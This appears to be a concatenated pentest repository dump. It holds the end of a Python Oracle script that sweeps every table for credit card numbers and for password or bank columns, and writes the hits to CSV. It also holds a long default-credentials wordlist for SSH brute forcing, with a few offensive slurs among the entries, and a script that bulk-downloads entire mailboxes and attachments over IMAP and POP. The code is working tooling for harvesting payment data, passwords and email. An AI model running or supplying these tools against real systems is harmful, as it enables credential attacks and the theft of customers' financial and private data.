Regex 22 | ccRegex.append("^5[1-5][0-9]{14}$") #Mastercard Regex 23 | ccRegex.append("^3[47][0-9]{13}$") #Amex Regex 24 | ccRegex.append("^3(?:0[0-5]|[68][0-9])[0-9]{11}$") #Diners Regex 25 | ccRegex.append("^6(?:011|5[0-9]{2})[0-9]{12}$") #Discover Regex 26 | ccRegex.append("^(?:2131|1800|35\d{3})\d{11}$") #JCDB Regex 27 | 28 | interestingData = False 29 | 30 | def cardLuhnChecksumIsValid(card_number): 31 | """ checks to make sure that the card passes a luhn mod-10 checksum """ 32 | 33 | sum = 0 34 | num_digits = len(card_number) 35 | oddeven = num_digits & 1 36 | 37 | for count in range(0, num_digits): 38 | digit = int(card_number[count]) 39 | 40 | if not (( count & 1 ) ^ oddeven ): 41 | digit = digit * 2 42 | if digit > 9: 43 | digit = digit - 9 44 | 45 | sum = sum + digit 46 | return ( (sum % 10) == 0 ) 47 | 48 | def dataExtract(username,password,hostname,sid,sample): 49 | print "[+] Extracting data from database" 50 | try: 51 | orcl1 = cx_Oracle.connect(username+"/"+password+"@"+hostname+":1521/"+sid) 52 | curs = orcl1.cursor() 53 | curs.execute("select * from v$database") 54 | for db_data in curs: 55 | #Iterate per database 56 | dbName = db_data[1] 57 | print "[+] Database found: "+dbName 58 | 59 | orcl2 = cx_Oracle.connect(username+"/"+password+"@"+hostname+":1521/"+sid) 60 | curs2 = orcl2.cursor() 61 | tblCount2 = curs2.execute("SELECT COUNT(*) FROM tab") 62 | #Get a count of the total tables in the databases 63 | if tblCount2<1: 64 | print "There are no tables in "+dbName+". Its possible that the account does not have access. Try escalating privileges." 
65 | if tblCount2: 66 | #Continue with CC data search 67 | orcl3 = cx_Oracle.connect(username+"/"+password+"@"+hostname+":1521/"+sid) 68 | curs3 = orcl3.cursor() 69 | curs3.execute("SELECT * FROM tab") #Get a list of all tables 70 | for row_data in curs3: 71 | #Iterate per table 72 | if not row_data[0].startswith('BIN$'): # skip recycle bin tables 73 | tableName = row_data[0] 74 | try: 75 | print colored("\n[+] Ransacking table: "+tableName+" in "+sid,"red",attrs=['bold']) 76 | orcl4 = cx_Oracle.connect(username+"/"+password+"@"+hostname+":1521/"+sid) 77 | sql4 = "select * from (select * from " + tableName+") where rownum <="+str(sample) 78 | curs4 = orcl4.cursor() 79 | curs4.execute(sql4) 80 | matchedRows = [] 81 | results = curs4.fetchall() 82 | except cx_Oracle.DatabaseError: 83 | continue 84 | except cx_Oracle.DatabaseError: 85 | continue 86 | 87 | global outputFileCSV 88 | if outputFileCSV!="": 89 | for result in results: 90 | print str(result) 91 | #Write all results to output file 92 | fo = open(outputFileCSV, "a+") 93 | fo.write(str(result)+"\n") 94 | fo.close() 95 | else: 96 | for result in results: 97 | print result 98 | results = curs4.fetchall() 99 | for searchStr in ccRegex: 100 | #Credit Card Regex Search 101 | p = re.compile(searchStr) 102 | for row_data in results: 103 | for col in row_data: 104 | if p.match(str(col)): 105 | #Run the found CC info thru LUHN algorithm to confirm 106 | n = p.match(str(col)) 107 | if cardLuhnChecksumIsValid(str(col)): 108 | print colored("[+] Found valid CC: %s in table %s [%s]" % (col, tableName, sid),"red",attrs=['bold']) 109 | else: 110 | print "%s is not valid credit card number" % col 111 | matchedRows.append(row_data) 112 | #Write rows that matched to csv file 113 | if len(matchedRows) > 0: 114 | csv_file_dest = dbName + '_' + tableName + ".csv" 115 | print colored("\n[+] Results for first ten rows have been saved to "+csv_file_dest+".","red",attrs=['bold']) 116 | outputFile = open(csv_file_dest,'w') 117 | output 
= csv.writer(outputFile, dialect='excel') 118 | 119 | #if printHeader: # add column headers if requested 120 | cols = [] 121 | for col in curs4.description: 122 | cols.append(col[0]) 123 | output.writerow(cols) 124 | 125 | for rows in matchedRows: # add table rows 126 | output.writerow(rows) 127 | outputFile.close() 128 | curs4.close() 129 | curs3.close() 130 | curs2.close() 131 | curs.close() 132 | 133 | except cx_Oracle.DatabaseError as e: 134 | print e 135 | tableNames = [] 136 | if "table or view does not exist" in str(e): 137 | print colored("\n[!] Account is not a DBA. Please try to use 'ora_priv.py'.","blue",attrs=['bold']) 138 | orcl2 = cx_Oracle.connect(username+"/"+password+"@"+hostname+":1521/"+sid) 139 | curs2 = orcl2.cursor() 140 | curs2.execute("SELECT table_name FROM user_tables") 141 | #curs2.execute("SELECT table_name FROM all_tab_columns WHERE column_name LIKE \'%%\'") 142 | for row_data in curs2: 143 | #Iterate per table 144 | if not row_data[0].startswith('BIN$'): # skip recycle bin tables 145 | tableName = row_data[0] 146 | if tableName not in tableNames: 147 | tableNames.append(tableName) 148 | for tableName in tableNames: 149 | print str(tableName) 150 | try: 151 | print colored("\n[+] Ransacking table: "+tableName+" in "+sid,"red",attrs=['bold']) 152 | orcl4 = cx_Oracle.connect(username+"/"+password+"@"+hostname+":1521/"+sid) 153 | sql4 = "SELECT column_name FROM USER_TAB_COLUMNS WHERE table_name = '"+str(tableName)+"'" 154 | curs4 = orcl4.cursor() 155 | curs4.execute(sql4) 156 | matchedRows = [] 157 | results = curs4.fetchall() 158 | #print str(results) 159 | newResults = str(results).lower() 160 | global interestingData 161 | if interestingData == True: 162 | if "card" in newResults or "credit" in newResults or "bank" in newResults or "passw" in newResults: 163 | print str(results) 164 | orcl5 = cx_Oracle.connect(username+"/"+password+"@"+hostname+":1521/"+sid) 165 | sql5 = "select * from (select * from " + tableName+") where rownum 
<="+str(sample) 166 | curs5 = orcl4.cursor() 167 | curs5.execute(sql5) 168 | matchedRows = [] 169 | results = curs5.fetchall() 170 | for result in results: 171 | print str(result) 172 | else: 173 | print str(results) 174 | orcl5 = cx_Oracle.connect(username+"/"+password+"@"+hostname+":1521/"+sid) 175 | sql5 = "select * from (select * from " + tableName+") where rownum <="+str(sample) 176 | curs5 = orcl4.cursor() 177 | curs5.execute(sql5) 178 | matchedRows = [] 179 | results = curs5.fetchall() 180 | for result in results: 181 | print str(result) 182 | 183 | except cx_Oracle.DatabaseError as e: 184 | if "table or view does not exist" in str(e): 185 | pass 186 | #for result in results: 187 | # print str(result) 188 | # print "cx_Oracle.DatabaseError" 189 | # pass 190 | 191 | 192 | #outputFileCSV="output4.csv" 193 | interestingData=False 194 | 195 | if __name__=="__main__": 196 | parser = argparse.ArgumentParser(description='Oracle Privilege Escalation') 197 | parser.add_argument('-host', help='IP or host name of Oracle server') 198 | parser.add_argument('-hostFile', dest='hostFile', help='File containing IP addresses of oracle servers') 199 | parser.add_argument('-u', dest='username', help='Use this username to authenticate') 200 | parser.add_argument('-p', dest='password', help='Use this password to authenticate') 201 | parser.add_argument('-sid', dest='sid', help='Use this sid') 202 | parser.add_argument('-sample', dest='sample', help='Sample size') 203 | parser.add_argument('-idf', action='store_true', help='Interesting Data Finder') 204 | args = vars(parser.parse_args()) 205 | 206 | hostList = [] 207 | counter=0 208 | 209 | if args['host']!=None: 210 | counter+=1 211 | 212 | if args['hostFile']!=None: 213 | counter+=1 214 | 215 | if args['hostFile']!=None and args['host']==None: 216 | for line in open(args['hostFile'],'r'): 217 | hostList.append(line.strip()) 218 | 219 | if args['host']!=None and args['hostFile']==None: 220 | hostList.append(args['host']) 221 | 
222 | if counter==0 or counter>1: 223 | print colored("[+] Please use either -host or -hostFile.","red",attrs=['bold']) 224 | sys.exit(0) 225 | 226 | if args['sid']!=None: 227 | sid = args['sid'] 228 | 229 | if args['sample']!=None: 230 | sample = args['sample'] 231 | 232 | if args['idf']: 233 | interestingData=True 234 | 235 | #Check if username/password is provided in the command line 236 | credCount=0 237 | 238 | if args['username']!=None: 239 | credCount+=1 240 | if args['password']!=None: 241 | credCount+=1 242 | if credCount>1 and credCount<2: 243 | print "[!] You need to provide both -u and -p." 244 | sys.exit(0) 245 | 246 | #Load hostname 247 | for hostname in hostList: 248 | if len(hostname)<1: 249 | sys.exit(0) 250 | 251 | socketAvail = False 252 | try: 253 | socket.setdefaulttimeout(2) 254 | s = socket.socket() 255 | s.connect((hostname,1521)) 256 | socketAvail=True 257 | print "[+] Connected to "+hostname+":1521" 258 | except: 259 | print "[-] Cannot connect to "+hostname+":1521" 260 | 261 | if socketAvail==True: 262 | username = args['username'] 263 | password = args['password'] 264 | print "[+] [SID:"+sid+"] Testing accounts. 
" 265 | if args['sample']==None: 266 | sample=5 267 | dataExtract(username,password,hostname,sid,sample) 268 | -------------------------------------------------------------------------------- /default_accounts_wordlist/wordList_ssh.txt: -------------------------------------------------------------------------------- 1 | :n/a:admin 2 | :n/a:(none) 3 | :l2:l2 4 | :l3:l3 5 | :ro:ro 6 | :rw:rw 7 | :rwa:rwa 8 | :sa:(none) 9 | :sa:sasasa 10 | :sysadmin:master 11 | :sysadm:sysadm 12 | :guest:(none) 13 | :nop:12345 14 | :admin:(none) 15 | :autocad:autocad 16 | :(any 3 characters):cascade 17 | :Administrator:changeme 18 | :Admin:No 19 | :admin:bintec 20 | :config:biodata 21 | :root:last 6 characters of the MAC ADRESS "if it contains any alpha characters, type them as upper case" 22 | :root:Last 6 characters (chars uppercased) from MAC Address 23 | :(none):admin 24 | :diag:danger 25 | :manuf:xxyyzz 26 | :N/A:AUTORAID 27 | :Admin:admin1 28 | :Administrator:admin 29 | :memotec:supervisor 30 | :1:syslib 31 | :1:operator 32 | :1:manager 33 | :2:maintain 34 | :2:syslib 35 | :2:manager 36 | :2:operator 37 | :30:games 38 | :5:games 39 | :7:maintain 40 | :operator:admin 41 | :n/a:ACCESS 42 | :n/a:SYSTEM 43 | :craft:(none) 44 | :admin:none 45 | :admin:year2000 46 | :admin:____BLANK___ 47 | :m1122:m1122 48 | :SETUP:(none) 49 | :LIBRARY:(none) 50 | :james:james 51 | :NICONEX:NICONEX 52 | :(none):enter 53 | :file:file 54 | :admin:abc123 55 | :ami:(none) 56 | :mountsys:mountsys 57 | :news:news 58 | :news:(none) 59 | :nobody:(none) 60 | :nobody:nobody 61 | :nuucp:(none) 62 | :operator:(none) 63 | :oracle:(none) 64 | :postmaster:postmast 65 | :postmaster:(none) 66 | :powerdown:powerdown 67 | :rje:rje 68 | :root:(none) 69 | :shutdown:shutdown 70 | :shutdown:(none) 71 | :sync:sync 72 | :sync:(none) 73 | :sys:system 74 | :sys:bin 75 | :sysadm:admin 76 | :sysadmin:sysadmin 77 | :sysbin:sysbin 78 | :system_admin:(none) 79 | :checkfsys:checkfsys 80 | :checksys:checksys 81 | :daemon:daemon 82 | 
:daemon:(none) 83 | :demo:(none) 84 | :demos:demos 85 | :demos:(none) 86 | :dni:(none) 87 | :dni:dni 88 | :fal:(none) 89 | :fal:fal 90 | :fax:(none) 91 | :fax:fax 92 | :ftp:(none) 93 | :ftp:ftp 94 | :games:games 95 | :games:(none) 96 | :gopher:gopher 97 | :gropher:(none) 98 | :guest:guestgue 99 | :halt:halt 100 | :halt:(none) 101 | :root:hp 102 | :install:install 103 | :lp:lp 104 | :lp:bin 105 | :lp:lineprin 106 | :lp:(none) 107 | :lpadm:lpadm 108 | :lpadmin:lpadmin 109 | :lynx:lynx 110 | :lynx:(none) 111 | :mail:(none) 112 | :mail:mail 113 | :man:man 114 | :man:(none) 115 | :me:(none) 116 | :me:me 117 | :mountfs:mountfs 118 | :mountfsys:mountfsys 119 | :system_admin:system_admin 120 | :trouble:trouble 121 | :umountfs:umountfs 122 | :umountfsys:umountfsys 123 | :umountsys:umountsys 124 | :unix:unix 125 | :uucp:uucp 126 | :uucpadm:uucpadm 127 | :web:(none) 128 | :web:web 129 | :webmaster:webmaster 130 | :webmaster:(none) 131 | :www:(none) 132 | :www:www 133 | :adm:adm 134 | :adm:(none) 135 | :administrator:(none) 136 | :anon:anon 137 | :bbs:bbs 138 | :bbs:(none) 139 | :bin:sys 140 | :checkfs:checkfs 141 | :Admin:atc456 142 | :LessonUser1:(none) 143 | :LessonUser2:(none) 144 | :(none):speedxess 145 | :drhhdrhhd:dhrhdhhhh 146 | :31994:31994 147 | :n/a:access 148 | :MGR:TELESUP 149 | :MGR:HPDESK 150 | :MGR:CCC 151 | :MGR:CNAS 152 | :MGR:WORD 153 | :MGR:COGNOS 154 | :MGR:ROBELLE 155 | :MGR:HPOFFICE 156 | :MGR:HPONLY 157 | :MGR:HPP187 158 | :MGR:HPP189 159 | :MGR:HPP196 160 | :MGR:INTX3 161 | :MGR:ITF3000 162 | :MGR:NETBASE 163 | :MGR:REGO 164 | :MGR:RJE 165 | :MGR:CONV 166 | :OPERATOR:SYS 167 | :OPERATOR:DISC 168 | :OPERATOR:SYSTEM 169 | :OPERATOR:SUPPORT 170 | :OPERATOR:COGNOS 171 | :PCUSER:SYS 172 | :RSBCMON:SYS 173 | :SPOOLMAN:HPOFFICE 174 | :WP:HPOFFICE 175 | :ADVMAIL:HPOFFICE DATA 176 | :ADVMAIL:HP 177 | :FIELD:SUPPORT 178 | :FIELD:MGR 179 | :FIELD:SERVICE 180 | :FIELD:MANAGER 181 | :FIELD:HPP187 SYS 182 | :FIELD:LOTUS 183 | :FIELD:HPWORD PUB 184 | :FIELD:HPONLY 
185 | :HELLO:MANAGER.SYS 186 | :HELLO:MGR.SYS 187 | :HELLO:FIELD.SUPPORT 188 | :HELLO:OP.OPERATOR 189 | :MAIL:MAIL 190 | :MAIL:REMOTE 191 | :MAIL:TELESUP 192 | :MAIL:HPOFFICE 193 | :MAIL:MPE 194 | :MANAGER:TCH 195 | :MANAGER:SYS 196 | :MANAGER:SECURITY 197 | :MANAGER:ITF3000 198 | :MANAGER:HPOFFICE 199 | :MANAGER:COGNOS 200 | :MANAGER:TELESUP 201 | :MGE:VESOFT 202 | :MGR:SYS 203 | :MGR:CAROLIAN 204 | :MGR:VESOFT 205 | :MGR:XLSERVER 206 | :MGR:SECURITY 207 | :admin:rainbow 208 | :admin:hello 209 | :khan:kahn 210 | :SYSDBA:masterkey 211 | :IntraStack:Asante 212 | :IntraSwitch:Asante 213 | :cisco:cisco 214 | :n/a:c 215 | :n/a:cisco 216 | :n/a:Cisco router 217 | :n/a:cc 218 | :enable:cisco 219 | :accounting:accounting 220 | :boss:boss 221 | :manager:manager 222 | :PDP11:PDP11 223 | :PDP8:PDP8 224 | :software:software 225 | :tutor:(none) 226 | :tutor:tutor 227 | :4Dgifts:4Dgifts 228 | :4Dgifts:(none) 229 | :Ezsetup:(none) 230 | :tour:tour 231 | :OutOfBox:(none) 232 | :n/a:1RRWTTOOI 233 | :1234567890:bloggs 234 | :Sysop:Sysop 235 | :admin:Ascend 236 | :SYSADM:sysadm 237 | :MCVEADMIN:password 238 | :(none):help 239 | :mediator:mediator 240 | :root:Mau dib 241 | :disttech:4tas 242 | :maint:maint 243 | :ccrusr:ccrusr 244 | :mlusr:mlusr 245 | :root:3ep5w2u 246 | :maint:ntacdmax 247 | :intelligent_guy_priyank:passwordguy 248 | :handsome_123_handsome:plsdontguess 249 | :MICRO:RSX 250 | :Admin:admin 251 | :admin:2222 252 | :ncrm:ncrm 253 | :admin:tetra 254 | :(none):(none) 255 | :netrangr:attack 256 | :LASERWRITER:(none) 257 | :MAIL:(none) 258 | :POST:(none) 259 | :POST:POST 260 | :PRINT:(none) 261 | :PRINT:PRINT 262 | :PRINTER:(none) 263 | :PRINTER:PRINTER 264 | :ROOT:(none) 265 | :ROOT:ROOT 266 | :ROUTER:(none) 267 | :SABRE:(none) 268 | :SUPERVISOR:NETFRAME 269 | :SUPERVISOR:NFI 270 | :SUPERVISOR:NF 271 | :SUPERVISOR:HARRIS 272 | :SUPERVISOR:SUPERVISOR 273 | :SUPERVISOR:(none) 274 | :SUPERVISOR:SYSTEM 275 | :TEST:TEST 276 | :TEST:(none) 277 | :USER_TEMPLATE:(none) 278 | 
:USER_TEMPLATE:USER_TEMPLATE 279 | :WANGTEK:(none) 280 | :WANGTEK:WANGTEK 281 | :WINDOWS_PASSTHRU:WINDOWS_PASSTHRU 282 | :WINDOWS_PASSTHRU:(none) 283 | :WINSABRE:SABRE 284 | :WINSABRE:WINSABRE 285 | :ADMIN:ADMIN 286 | :ADMIN:(none) 287 | :BACKUP:BACKUP 288 | :CHEY_ARCHSVR:CHEY_ARCHSVR 289 | :CHEY_ARCHSVR:(none) 290 | :FAX:FAX 291 | :FAX:(none) 292 | :FAXUSER:FAXUSER 293 | :FAXUSER:(none) 294 | :FAXWORKS:(none) 295 | :FAXWORKS:FAXWORKS 296 | :GATEWAY:GATEWAY 297 | :GATEWAY:(none) 298 | :GUEST:TSEUG 299 | :GUEST:GUESTGUEST 300 | :GUEST:GUESTGUE 301 | :GUEST:GUEST 302 | :GUEST:(none) 303 | :HPLASER:(none) 304 | :HPLASER:HPLASER 305 | :LASER:(none) 306 | :BACKUP:(none) 307 | :ARCHIVIST:ARCHIVIST 308 | :LASER:LASER 309 | :LASERWRITER:LASERWRITER 310 | :ARCHIVIST:(none) 311 | :admin:my_DEMARC 312 | :signa:signa 313 | :root:NeXT 314 | :root:nokia 315 | :n/a:symantec 316 | :n/a:1064 317 | :adminttd:adminttd 318 | :ftp_admi:kilo1987 319 | :n/a:123456 320 | :SYSMAN:oem_temp 321 | :CTXSYS:(none) 322 | :DEMO:DEMO 323 | :MTYSYS:MTYSYS 324 | :SCOTT:TIGER 325 | :SYS:CHANGE_ON_INSTALL 326 | :SYSTEM:MANAGER 327 | :TRACESRV:TRACE 328 | :APPLSYS:APPLSYS 329 | :AURORA@ORB@UNAUTHENTICATED:INVALID 330 | :11111111:11111111 331 | :22222222:22222222 332 | :ibm:password 333 | :ibm:2222 334 | :ibm:service 335 | :qpgmr:qpgmr 336 | :qsecofr:qsecofr 337 | :qsecofr:11111111 338 | :qsecofr:22222222 339 | :qserv:qserv 340 | :qsrv:qsrv 341 | :qsrvbas:qsrvbas 342 | :qsvr:qsvr 343 | :qsvr:ibmcel 344 | :qsysopr:qsysopr 345 | :quser:quser 346 | :secofr:secofr 347 | :patrol:patrol 348 | :PO8:PO8 349 | :tech:field 350 | :SUPERVISOR:DISCAR 351 | :supervisor:supervisor 352 | :primos_cs:primos 353 | :guest1:guest1 354 | :primos_cs:prime 355 | :system:prime 356 | :system:system 357 | :tele:tele 358 | :prime:prime 359 | :primenet:primenet 360 | :primenet:primeos 361 | :netlink:netlink 362 | :mfd:mfd 363 | :guest1:guest 364 | :root:ascend 365 | :readwrite:lucenttech1 366 | :readonly:lucenttech2 367 | 
:admin:rmnetlm 368 | :admin2:changeme 369 | :adminstrator:changeme 370 | :deskalt:password 371 | :deskman:changeme 372 | :desknorm:password 373 | :deskres:password 374 | :replicator:replicator 375 | :RMUser1:password 376 | :topicalt:password 377 | :topicnorm:password 378 | :topicres:password 379 | :setup:changeme 380 | :teacher:password 381 | :temp1:password 382 | :1.1:SYSTEM 383 | :BATCH:BATCH 384 | :SYSTEM:SYSTEM 385 | :admin:private 386 | :ADMN:admn 387 | :GEN1:gen1 388 | :GEN2:gen2 389 | :Guest:(none) 390 | :gonzo:(none) 391 | :snake:(none) 392 | :satan:(none) 393 | :sa:(blank) 394 | ::sa 395 | :stuccoboy:100198 396 | :fucking:javascript faggots 397 | :DBA:SQL 398 | :bciim:bciimpw 399 | :bcim:bcimpw 400 | :bcms:bcmspw 401 | :bcnas:bcnaspw 402 | :blue:bluepw 403 | :browse:browsepw 404 | :browse:looker 405 | :craft:craft 406 | :craft:craftpw 407 | :cust:custpw 408 | :enquiry:enquirypw 409 | :field:support 410 | :inads:indspw 411 | :inads:inads 412 | :init:initpw 413 | :locate:locatepw 414 | :maint:maintpw 415 | :maint:rwmaint 416 | :nms:nmspw 417 | :rcust:rcustpw 418 | :support:supportpw 419 | ::use ALT+G at boot to reset config 420 | :(none):744 421 | :secoff:secoff 422 | :tellabs:tellabs#1 423 | :storwatch:specialist 424 | :Administrator:ganteng 425 | :managers:managers 426 | :root:uClinux 427 | :Any:12345 428 | :admin:utstar 429 | :n/a:SY_MB 430 | :n/a:system 431 | :OP1:(none) 432 | :OPERATNS:(none) 433 | :OPERATOR:(none) 434 | :PDMREMI:(none) 435 | :PENG:(none) 436 | :PROCAL:(none) 437 | :PRODBM:(none) 438 | :PROMAIL:(none) 439 | :PSFMAINT:(none) 440 | :PVM:(none) 441 | :RDM470:(none) 442 | :RSCS:(none) 443 | :RSCSV2:(none) 444 | :SAVSYS:(none) 445 | :SFCMI:(none) 446 | :SFCNTRL:(none) 447 | :SMART:(none) 448 | :SQLDBA:(none) 449 | :SQLUSER:(none) 450 | :SYSADMIN:(none) 451 | :SYSCKP:(none) 452 | :SYSDUMP1:(none) 453 | :SYSERR:(none) 454 | :SYSWRM:(none) 455 | :TDISK:(none) 456 | :TEMP:(none) 457 | :TSAFVM:(none) 458 | :VASTEST:(none) 459 | :VM3812:(none) 460 
| :VMARCH:(none) 461 | :VMASMON:(none) 462 | :VMASSYS:(none) 463 | :VMBACKUP:(none) 464 | :VMBSYSAD:(none) 465 | :VMMAP:(none) 466 | :VMTAPE:(none) 467 | :VMTLIBR:(none) 468 | :VMUTIL:(none) 469 | :VSEIPO:(none) 470 | :VSEMAINT:(none) 471 | :VSEMAN:(none) 472 | :VTAM:(none) 473 | :VTAMUSER:(none) 474 | :DEMO4:(none) 475 | :$ALOC$:(none) 476 | :AP2SVP:(none) 477 | :APL2PP:(none) 478 | :AUTOLOG1:(none) 479 | :BATCH:(none) 480 | :BATCH1:(none) 481 | :BATCH2:(none) 482 | :CCC:(none) 483 | :CMSBATCH:(none) 484 | :CMSUSER:(none) 485 | :CPNUC:(none) 486 | :CPRM:(none) 487 | :CSPUSER:(none) 488 | :CVIEW:(none) 489 | :DATAMOVE:(none) 490 | :DEMO1:(none) 491 | :DEMO3:(none) 492 | :DEMO2:(none) 493 | :DIRECT:(none) 494 | :DIRMAINT:(none) 495 | :DISKCNT:(none) 496 | :EREP:(none) 497 | :FSFADMIN:(none) 498 | :FSFTASK1:(none) 499 | :FSFTASK2:(none) 500 | :GCS:(none) 501 | :IDMS:(none) 502 | :IDMSSE:(none) 503 | :IIPS:(none) 504 | :IPFSERV:(none) 505 | :ISPVM:(none) 506 | :IVPM1:(none) 507 | :IVPM2:(none) 508 | :MAINT:(none) 509 | :MOESERV:(none) 510 | :NEVIEW:(none) 511 | :OLTSEP:(none) 512 | :TELEDEMO:TELEDEMO 513 | :UETP:UETP 514 | :USER:PASSWORD 515 | :USERP:USERP 516 | :VAX:VAX 517 | :VMS:VMS 518 | :ALLIN1:ALLIN1 519 | :ALLIN1MAIL:ALLIN1MAIL 520 | :ALLINONE:ALLINONE 521 | :DCL:DCL 522 | :DECMAIL:DECMAIL 523 | :DECNET:DECNET 524 | :DECNET:NONPRIV 525 | :PRIV:PRIV 526 | :REPORT:REPORT 527 | :RJE:RJE 528 | :STUDENT:STUDENT 529 | :SYS:SYS 530 | :SYSMAINT:SYSMAINT 531 | :SYSMAINT:SERVICE 532 | :SYSMAINT:DIGITAL 533 | :SYSTEM:OPERATOR 534 | :SYSTEM:SYSLIB 535 | :SYSTEST:UETP 536 | :DEFAULT:USER 537 | :SYSTEST_CLIG:SYSTEST_CLIG 538 | :DEFAULT:DEFAULT 539 | :FIELD:FIELD 540 | :FIELD:TEST 541 | :FIELD:DIGITAL 542 | :HELP:HELP 543 | :HELPDESK:HELPDESK 544 | :HOST:HOST 545 | :INFO:INFO 546 | :INGRES:INGRES 547 | :LINK:LINK 548 | :MAILER:MAILER 549 | :MBMANAGER:MBMANAGER 550 | :MBWATCH:MBWATCH 551 | :NETCON:NETCON 552 | :NETMGR:NETMGR 553 | :NETNONPRIV:NETNONPRIV 554 | 
:SYSTEST_CLIG:SYSTEST 555 | :NETPRIV:NETPRIV 556 | :NETSERVER:NETSERVER 557 | :NEWINGRES:NEWINGRES 558 | :NEWS:NEWS 559 | :OPERVAX:OPERVAX 560 | :POSTMASTER:POSTMASTER 561 | :(none):default 562 | :Administrator:(none) 563 | :User:User 564 | :Guest:Guest 565 | :IS_$hostname:(same) 566 | :Administrator:Administrator 567 | :admin:comcomcom 568 | :(none):Intel 569 | :sherzad420:pakistan 570 | -------------------------------------------------------------------------------- /emaildownloader/emailDownloader.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # -*- coding: utf-8 -*- 3 | 4 | import email,os,imaplib 5 | from imapclient import IMAPClient 6 | from email.utils import parseaddr 7 | import socket,sys,time 8 | import multiprocessing 9 | import getpass, poplib 10 | import socket 11 | 12 | imapserver = '' 13 | popserver = '' 14 | verbose=False 15 | SSL=True 16 | SEARCH=False 17 | USERNAME = '' 18 | PASSWORD = '' 19 | INPUTFILE = '' 20 | emails_dir = os.getcwd()+"/result/" 21 | 22 | 23 | def isOpen(ip,port): 24 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 25 | try: 26 | s.settimeout(1) 27 | s.connect((ip, int(port))) 28 | s.close() 29 | return True 30 | except: 31 | return False 32 | 33 | def fetch_email(server,msgid,username): 34 | if not os.path.exists(emails_dir+"attachments/"+username): 35 | os.makedirs(emails_dir+"attachments/"+username) 36 | 37 | response = server.fetch(msgid, ['RFC822']) 38 | for msgid, data in response.iteritems(): 39 | msg_string = data['RFC822'] 40 | msg = email.message_from_string(msg_string) 41 | if msg.get_content_maintype() == 'multipart': 42 | for part in msg.walk(): 43 | filename = part.get_filename() 44 | if filename: 45 | msgbody = (part.get_payload(decode=True)) 46 | if msgbody!=None: 47 | att_path = os.path.join(emails_dir+"attachments/"+username+"/", filename) 48 | if not os.path.exists(att_path): 49 | print "[+] Saving attachments: "+att_path 50 | fp = 
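open(att_path, 'wb')
                            fp.write(msgbody)
                            fp.close()
                        else:
                            if verbose==True:
                                print "[-] Skipping "+att_path


        if msg.get_content_maintype() != 'multipart':
            continue
        for part in msg.walk():
            msgbody = ""
            #print 'Content-Type:',part.get_content_type()
            #print 'Main Content:',part.get_content_maintype()
            #print 'Sub Content:',part.get_content_subtype()

            if part.get_content_maintype() == 'multipart':
                continue
            if part.get_content_subtype() == 'plain':
                msgbody = part.get_payload(decode=True)
                return msgbody
            if part.get_content_subtype() == 'html':
                msgbody = part.get_payload(decode=True)
                return msgbody

            #if part.get_content_maintype() == 'multipart':
            #    continue
            if part.get('Content-Disposition') is None:
                continue
            #else:
            #    print part.get_content_maintype()
            #    msgbody = (part.get_payload(decode=True))
            #    print msgbody


"""
"""


def _containedPath(base, *parts):
    """Join *parts* onto *base*; return the path, or None if it escapes *base*.

    Attachment file names and IMAP folder names are supplied by the remote
    mailbox, so they must never be able to address a location outside the
    local result tree (for example a name such as "../../x").  A result equal
    to *base* itself is also rejected.
    """
    target = os.path.join(base, *parts)
    baseAbs = os.path.abspath(base)
    targetAbs = os.path.abspath(target)
    if targetAbs == baseAbs or not targetAbs.startswith(baseAbs + os.sep):
        return None
    return target


def _attachmentName(part):
    """Return a safe on-disk name for an attachment part, or None if it has none.

    Only the base name is kept, so a remote-supplied name cannot carry a
    directory component; names that reduce to '', '.' or '..' are rejected.
    NOTE(review): fetch_email() above still uses part.get_filename() as-is
    for the IMAP path; it should go through this helper too.
    """
    filename = part.get_filename()
    if not filename:
        return None
    filename = os.path.basename(filename.replace('\\', '/'))
    if filename in ('', '.', '..'):
        return None
    return filename


def _saveAttachment(part, username):
    """Write one attachment part under emails_dir + "attachments/<username>/".

    Existing files are left untouched.  Returns the path written, or None
    when the part has no usable file name, no payload, an unsafe name, or
    the file already exists.
    """
    filename = _attachmentName(part)
    if filename is None:
        return None
    attachmentDir = emails_dir+"attachments/"+username
    if not os.path.exists(attachmentDir):
        os.makedirs(attachmentDir)
    payload = part.get_payload(decode=True)
    if payload is None:
        return None
    att_path = _containedPath(attachmentDir, filename)
    if att_path is None:
        print "[-] Rejecting unsafe attachment name: "+repr(filename)
        return None
    if os.path.exists(att_path):
        if verbose==True:
            print "[-] Skipping "+att_path
        return None
    print "[+] Saving attachments: "+att_path
    with open(att_path, 'wb') as fp:
        fp.write(payload)
    return att_path


def connectMailboxPOP(username,password,popserver,SSL):
    """Download an entire POP3 inbox into the local result tree.

    Messages are fetched newest-first.  The first text/* part of message
    number n (counting from 1 in download order) is written to
    ``emails_dir + "emails/<username>/Inbox/<n>"``; every part that has a
    Content-Disposition and a file name is written under
    ``emails_dir + "attachments/<username>/"``.  Files that already exist
    are skipped, so a rerun only fills the gaps.  Nothing is deleted from
    the server.

    Args:
        username: mailbox login; also used as the on-disk folder name.
        password: mailbox password.
        popserver: POP3 host name.
        SSL: True for POP3S on port 995, False for plain POP3 on port 110.

    Raises:
        poplib.error_proto: on authentication or protocol failure.
        socket.error: if the server cannot be reached.
    """
    print "[*] Accessing: "+popserver+" - "+username

    emailPath = emails_dir+"emails/"+username+"/Inbox"
    if not os.path.exists(emailPath):
        os.makedirs(emailPath)

    if SSL==True:
        Mailbox = poplib.POP3_SSL(popserver, 995)
    else:
        Mailbox = poplib.POP3(popserver, 110)
    try:
        Mailbox.user(username)
        Mailbox.pass_(password)

        numMessages = len(Mailbox.list()[1])
        print "[+] Downloading: "+str(numMessages)+" email(s) - "+username

        for i in range(numMessages):
            # POP3 numbers messages 1..numMessages; walk them from the newest
            # down, but store them under the download index i+1.
            response = Mailbox.retr(numMessages-i)
            lines = response[1]
            emailMessage = email.message_from_string('\n'.join(lines))
            att_path = os.path.join(emailPath, str(i+1))

            for part in emailMessage.walk():
                if part.get_content_maintype() == 'text':
                    msgbody = part.get_payload(decode=True)
                    if os.path.exists(att_path):
                        if verbose==True:
                            print "[-] Skipping "+att_path+" of "+str(numMessages)+" emails"
                    elif msgbody:
                        if verbose==True:
                            print "[+] Saving emails: "+att_path+" of "+str(numMessages)+" emails"
                        with open(att_path, 'wb') as fp:
                            fp.write(msgbody)

                if part.get_content_maintype() == 'multipart':
                    continue
                if part.get('Content-Disposition') is None:
                    continue
                _saveAttachment(part, username)
    finally:
        # No DELE is ever issued, so QUIT only ends the session.  Best effort:
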